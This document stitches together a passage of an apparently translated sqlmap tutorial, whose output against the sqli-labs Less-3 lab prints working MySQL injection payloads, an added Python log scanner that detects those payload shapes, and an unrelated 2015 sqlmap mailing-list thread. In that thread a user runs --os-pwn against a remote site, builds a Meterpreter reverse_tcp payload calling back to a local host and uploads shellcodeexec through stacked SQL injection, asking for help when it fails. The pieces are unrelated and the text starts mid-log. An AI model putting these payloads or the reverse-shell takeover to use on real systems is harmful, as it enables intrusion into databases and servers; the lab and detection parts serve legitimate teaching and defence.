[11:06:57] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:06:57] [INFO] testing if the target URL content is stable
[11:06:58] [INFO] target URL content is stable
[11:06:58] [INFO] testing if GET parameter 'id' is dynamic
[11:06:58] [INFO] GET parameter 'id' appears to be dynamic
[11:06:58] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:06:58] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:06:58] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[11:07:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:07:06] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:07:06] [INFO] testing 'Generic inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:07:06] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:07:06] [INFO] testing 'MySQL inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:07:06] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:07:13] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:07:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:07:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:07:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:07:13] [INFO] target URL appears to have 3 columns in query
[11:07:13] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1324=1324 AND ('QGoK'='QGoK

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 4928 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(4928=4928,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LiLq'='LiLq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2335') UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6f74417665587859716869647543466d4c486e59584d504148467673707957736957435651565950,0x716a6a7071)-- -
---
[11:07:45] [INFO] the back-end DBMS is MySQL
[11:07:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[11:07:45] [INFO] fetching current database
current database: 'security'
[11:07:45] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 11:07:45 /2020-03-01/


The output contains the section:

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn

SELECT(SLEEP(3)) means the SELECT statement is delayed by 3 seconds.

3. Setting the number of UNION columns in sqlmap

When performing UNION query injection, sqlmap automatically detects the number of columns in the range 1 to 10;
when the level value is higher, the upper limit of the column-count detection range is extended to 50.
Parameter:
--union-cols
This parameter can be used to specify the detection range for the number of columns; for example, --union-cols 12-16 makes sqlmap's column-count detection range 12 to 16.
To verify:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18

Output:

[screenshot: union-cols]

4. Setting the UNION character in sqlmap

Parameter:
--union-char
By default, sqlmap uses NULL values when performing UNION query injection.
But when the level value is high, sqlmap generates random numbers for UNION query injection, because injection with NULL sometimes fails where random numbers succeed.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123

Output:

[screenshot: union-char]

5. Setting the table for UNION queries in sqlmap

Parameter:
--union-from
In some cases the UNION query must name a valid, accessible table, otherwise the UNION query fails.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123 --union-from users

Output:

[screenshot: union-from]

6. Fingerprint recognition in sqlmap

Detecting the target's fingerprint information:
Parameter:
-f or --fingerprint
The usage and function of this parameter are similar to --banner.
To verify:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 -f

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:31:12 /2020-03-01/

[12:31:13] [INFO] testing connection to the target URL
[12:31:13] [INFO] testing if the target URL content is stable
[12:31:13] [INFO] target URL content is stable
[12:31:13] [INFO] testing if GET parameter 'id' is dynamic
[12:31:13] [INFO] GET parameter 'id' appears to be dynamic
[12:31:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:31:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:31:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[12:31:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:31:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[12:31:40] [INFO] testing 'Generic inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:31:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:31:40] [INFO] testing 'MySQL inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:31:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:31:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:31:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:31:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:31:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:31:51] [INFO] target URL appears to have 3 columns in query
[12:31:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1945=1945 AND ('oLHz'='oLHz

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 6730 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(6730=6730,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('IlMq'='IlMq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 1477 FROM (SELECT(SLEEP(5)))GkLS) AND ('Wwjt'='Wwjt

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4873') UNION ALL SELECT NULL,CONCAT(0x716a6a7171,0x45744c655268474b765270526d476a6a574a6d53776b4c637753784d664c6544774d766e664a5950,0x716a786a71),NULL-- -
---
[12:31:54] [INFO] testing MySQL
[12:31:54] [INFO] confirming MySQL
[12:31:54] [INFO] the back-end DBMS is MySQL
[12:31:54] [INFO] actively fingerprinting MySQL
[12:31:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:31:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
               html error message fingerprint: MySQL
[12:31:55] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 12:31:55 /2020-03-01/

An active fingerprint is shown, which gives basic information about the database.
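From the defender's side, every technique above leaves a recognisable shape in the web server's access log: SLEEP(n) for time-based blind (where n is the attacker's --time-sec), AND n=n pairs for boolean-based blind, FLOOR(RAND(0)*2) for the error-based payload, and UNION ALL SELECT for the UNION technique. The following scanner is an added example, not part of the tutorial or of sqlmap; it parses combined-format log lines, URL-decodes the request target, and reports per client IP which techniques were seen and which SLEEP durations were used. The log lines and the sqlmap User-Agent string are constructed for the demonstration.

```python
"""Scan access log lines for the sqlmap payload shapes shown above.

Added example (not from the tutorial or from sqlmap). Signatures are
modelled on the payloads sqlmap printed for sqli-labs Less-3; the log
lines below are constructed for this demonstration.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+)\s*\)", re.I)

# One regex per technique seen on this page; WAITFOR DELAY covers the
# MSSQL time-based form, SLEEP(n) the MySQL one.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|\bWAITFOR\s+DELAY\s+'", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}


def decode_target(path: str) -> str:
    """URL-decode twice: a second pass on plain text is a no-op, but it
    catches payloads that were sent double-encoded."""
    return unquote_plus(unquote_plus(path))


def classify_request(path: str) -> dict:
    """Map each matching technique to the payload fragment that triggered it."""
    decoded = decode_target(path)
    hits = {}
    for name, rx in SIGNATURES.items():
        m = rx.search(decoded)
        if m:
            hits[name] = m.group(0)
    return hits


def sleep_seconds(path: str):
    """Return n from SLEEP(n) (the attacker's --time-sec value) or None."""
    m = SLEEP_RE.search(decode_target(path))
    return int(m.group(1)) if m else None


def scan_log(lines):
    """Aggregate hits per client IP; IPs with no matching request are dropped."""
    report = defaultdict(lambda: {"requests": 0, "techniques": defaultdict(int),
                                  "sleep_seconds": set(), "user_agents": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        entry = report[m["ip"]]
        entry["requests"] += 1
        for tech in classify_request(m["path"]):
            entry["techniques"][tech] += 1
        secs = sleep_seconds(m["path"])
        if secs is not None:
            entry["sleep_seconds"].add(secs)
        if m["ua"]:
            entry["user_agents"].add(m["ua"])
    return {ip: e for ip, e in report.items() if e["techniques"]}


# Constructed sample: the Less-3 requests as a server would log them (URL-encoded).
SQLMAP_UA = "sqlmap/1.4.2.31#dev (http://sqlmap.org)"  # constructed default-style UA
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Mar/2020:11:06:57 +0000] "GET /sqli-labs/Less-3/?id=1 HTTP/1.1" 200 712 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Mar/2020:11:07:06 +0000] "GET /sqli-labs/Less-3/?id=1%27%29%20AND%201324%3D1324%20AND%20%28%27QGoK%27%3D%27QGoK HTTP/1.1" 200 712 "-" "' + SQLMAP_UA + '"',
    '127.0.0.1 - - [01/Mar/2020:11:07:06 +0000] "GET /sqli-labs/Less-3/?id=1%27%29%20AND%20%28SELECT%204928%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71707a6b71%2C%28SELECT%20%28ELT%284928%3D4928%2C1%29%29%29%2C0x716a6a7071%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%28%27LiLq%27%3D%27LiLq HTTP/1.1" 200 804 "-" "' + SQLMAP_UA + '"',
    '127.0.0.1 - - [01/Mar/2020:11:07:13 +0000] "GET /sqli-labs/Less-3/?id=1%27%29%20AND%20%28SELECT%209581%20FROM%20%28SELECT%28SLEEP%283%29%29%29pIsh%29%20AND%20%28%27YbSn%27%3D%27YbSn HTTP/1.1" 200 712 "-" "' + SQLMAP_UA + '"',
    '127.0.0.1 - - [01/Mar/2020:11:07:13 +0000] "GET /sqli-labs/Less-3/?id=-2335%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x71707a6b71%2C0x6f74%2C0x716a6a7071%29--%20- HTTP/1.1" 200 690 "-" "' + SQLMAP_UA + '"',
    '10.0.0.5 - - [01/Mar/2020:12:31:51 +0000] "GET /sqli-labs/Less-3/?id=1%27%29%20AND%20%28SELECT%201477%20FROM%20%28SELECT%28SLEEP%285%29%29%29GkLS%29%20AND%20%28%27Wwjt%27%3D%27Wwjt HTTP/1.1" 200 712 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, entry in scan_log(SAMPLE_LOG).items():
        print(ip, dict(entry["techniques"]), sorted(entry["sleep_seconds"]), sorted(entry["user_agents"]))
```

Signatures like these are a baseline only: sqlmap's --tamper scripts and --random-agent change the payload encoding and the User-Agent, so pair them with rate and response-time anomalies rather than relying on the strings alone.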


From: Peter Laboratra <mypen…@gm…> — 2015-07-02 07:13:56

Hi,
Thanks for your reply.

This time I tried with --fresh-queries without specific --techniques.

Why am I getting the error "page not found (404)" again and again? Does it
indicate that the file is being written but is deleted by anti-virus control or
something, and that's why the 404 error appears while calling the uploaded
file? Can this be the case? Need your opinion and expertise.


Thanks


--start---

root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn
--msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries


which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[11:12:52] [DEBUG] executing local command:
/opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R |
/opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o
"/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
[11:12:52] [INFO] creation in progress .................. done
[11:13:10] [DEBUG] the shellcode size is 308 bytes
[11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
[11:13:10] [DEBUG] going to upload the binary file with stacked query SQL
injection technique
[11:13:10] [INFO] using PowerShell to write the binary file content to file
'D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe'
[11:13:10] [DEBUG] uploading the base64-encoded file to D:Program
FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpfyort.txt,
please wait..
[11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to
D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmppsfpoc.ps1
[11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write
the D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe file, please wait..
[11:13:12] [WARNING] if you experience problems with non-ASCII identifier
names you are advised to rerun with '--tamper=charunicodeencode'
[11:13:12] [DEBUG] checking the length of the remote file D:Program
FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe
[11:13:12] [INFO] retrieved:
[11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
[11:13:13] [WARNING] it looks like the file has not been written (usually
occurs if the DBMS process' user has no write privileges in the destination
path)
do you want to try to upload the file with the custom Visual Basic script
technique? [Y/n] y
[11:13:15] [INFO] using a custom visual basic script to write the binary
file content to file 'D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe', please wait..
[11:13:15] [DEBUG] uploading the file base64-encoded content to D:Program
FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpfzlhn.txt,
please wait..
[11:13:16] [CRITICAL] page not found (404)
[11:13:16] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[*] shutting down at 11:13:16


--end---

On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <miros...@gm...
> wrote:

> Hi.
>
> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
> That way you'll kill the possibility to get perfectly valid results with
> other techniques
> 2) In current state, you've got some "trashy" characters (because of
> combination of laggy connection and stacked SQLi), like: "D:/Program
> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
> --fresh-queries in such situations (once per run where you expect resume of
> trashy chars) to force sqlmap to try to retrieve the problematic value once
> again.
>
> Bye
>
> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <mypen...@gm...>
> wrote:
>
>> Hi All,
>>
>> In the first phase of our test we discovered the target URL is vulnerable and we
>> managed to retrieve lots of information such as --users, --dbs, some of the
>> --tables and lots more. All this retrieval was very slow, probably due to the
>> time-based vulnerability; however, we tried through all (BEUSTQ) and found the same
>> state.
>>
>> During an attempt a few days after our success we noticed some of the
>> parameters are not working and we are receiving errors, for instance
>> during requery for --users we received error "[09:39:23] [CRITICAL] unable
>> to retrieve the number of database users". During requery for -U sa
>> --passwords we received "unnable to retrieve the password hashes for the
>> database users (probably because the session user has no read privileges
>> over the relevant system database table)".
>>
>> We moved to OS takeover, initially get error for xp_cmdshell however
>> activated and confirmed using SQLNinja and moved on to get --os-shell,
>> executed some of commands like "hostname", "whoami" and successfully
>> retrieved its output.
>>
>> Now after few minutes we noted that we are not getting any output of any
>> command with message "No output".
>>
>> We moved to --os-pwn + --msf-path, But again with no success on
>> meterpreter or VNC.
>> received error "HTTP error codes detected during run:
>> 404 (Not Found) - 1 times"
>>
>> I'm attaching the screen log, please help me with this if there is any scope
>> available.
>> Thanks in Advance.
>>
>>
>>
>> -------screen logs start-------
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
>> test_msf7 -v 2
>>          _
>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>> |_ -| . | |     | .'| . |
>> |___|_  |_|_|_|_|__,|  _|
>>       |_|           |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 10:03:33
>>
>> mytarget_login
>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>> [10:03:33] [DEBUG] not a valid WebScarab log data
>> [10:03:33] [DEBUG] cleaning up configuration parameters
>> test_msf7
>> mytarget_login
>> /opt/metasploit/apps/pro/msf3
>> [10:03:33] [INFO] setting file for logging HTTP traffic
>> [10:03:33] [DEBUG] setting the HTTP timeout
>> [10:03:33] [DEBUG] creating HTTP requests opener object
>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>> [10:03:33] [DEBUG] provided Metasploit Framework path
>> '/opt/metasploit/apps/pro/msf3' is valid
>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the
>> Cookie
>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>> [10:03:33] [INFO] testing connection to the target URL
>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>> sqlmap got a 302 redirect to '
>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
>> follow? [Y/n] Y
>> redirect is a result of a POST request. Do you want to resend original
>> POST data to a new location? [Y/n] Y
>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
>> reset by peer')
>> [10:03:56] [DEBUG] heuristically checking if the target is protected by
>> some kind of WAF/IPS/IDS
>> sqlmap identified the following injection points with a total of 0
>> HTTP(s) requests:
>> ---
>> Parameter: testNumber (POST)
>>     Type: stacked queries
>>     Title: Microsoft SQL Server/Sybase stacked queries
>>     Payload:
>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
>> WAITFOR DELAY '0:0:5'--&testPassword=3243
>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>> ---
>> [10:03:56] [INFO] testing Microsoft SQL Server
>> [10:03:56] [INFO] confirming Microsoft SQL Server
>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>> back-end DBMS: Microsoft SQL Server 2008
>> how do you want to establish the tunnel?
>> [1] TCP: Metasploit Framework (default)
>> [2] ICMP: icmpsh - ICMP tunneling
>> > 1
>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>> [10:04:00] [INFO] testing if current user is DBA
>> [10:04:00] [DEBUG] creating a support table to write commands standard
>> output to
>> [10:04:00] [WARNING] time-based comparison requires larger statistical
>> model, please wait..............................
>> [10:04:04] [WARNING] it is very important not to stress the network
>> adapter during usage of time-based payloads to prevent potential errors
>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>> [10:04:04] [WARNING] in case of continuous data retrieval problems you
>> are advised to try a switch '--no-cast' or switch '--hex'
>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>> which connection type do you want to use?
>> [1] Reverse TCP: Connect back from the database host to this machine
>> (default)
>> [2] Reverse TCP: Try to connect back from the database host to this
>> machine, on all ports example3ween the specified and 65535
>> [3] Reverse HTTP: Connect back from the database host to this machine
>> tunnelling traffic over HTTP
>> [4] Reverse HTTPS: Connect back from the database host to this machine
>> tunnelling traffic over HTTPS
>> [5] Bind TCP: Listen on the database host for a connection
>> > 1
>> what is the local address? [192.168.1.8]
>> which local port number do you want to use? [61371]
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [10:04:17] [DEBUG] executing local command:
>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>> [10:04:17] [INFO] creation in progress .................. done
>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
>> injection technique
>> [10:04:35] [INFO] using PowerShell to write the binary file content to
>> file 'D:Program FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo
>> Ātmpsebykt.exe'
>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:Program
>> FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpfidjf.txt,
>> please wait..
>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
>> D:Program FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo
>> Ātmppsbcbi.ps1
>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
>> write the D:Program FilesMicrosoft SQL
>> ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpsebykt.exe file, please wait..
>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier
>> names you are advised to rerun with '--tamper=charunicodeencode'
>> [10:04:37] [DEBUG] checking the length of the remote file D:Program
>> FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpsebykt.exe
>> [10:04:37] [INFO] retrieved:
>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>> [10:04:37] [WARNING] it looks like the file has not been written (usually
>> occurs if the DBMS process' user has no write privileges in the destination
>> path)
>> do you want to try to upload the file with the custom Visual Basic script
>> technique? [Y/n] Y
>> [10:04:41] [INFO] using a custom visual basic script to write the binary
>> file content to file 'D:Program FilesMicrosoft SQL
>> ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpsebykt.exe', please wait..
>> [10:04:41] [DEBUG] uploading the file base64-encoded content to
>> D:Program FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo
>> Ātmpfegab.txt, please wait..
>> [10:04:41] [CRITICAL] page not found (404)
>> [10:04:41] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>> that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 10:04:41
>>
>> root@kali:~#
>>
>>
>> -------screen logs end-------
>>
>>
>> Please help!!
>>
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlma...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
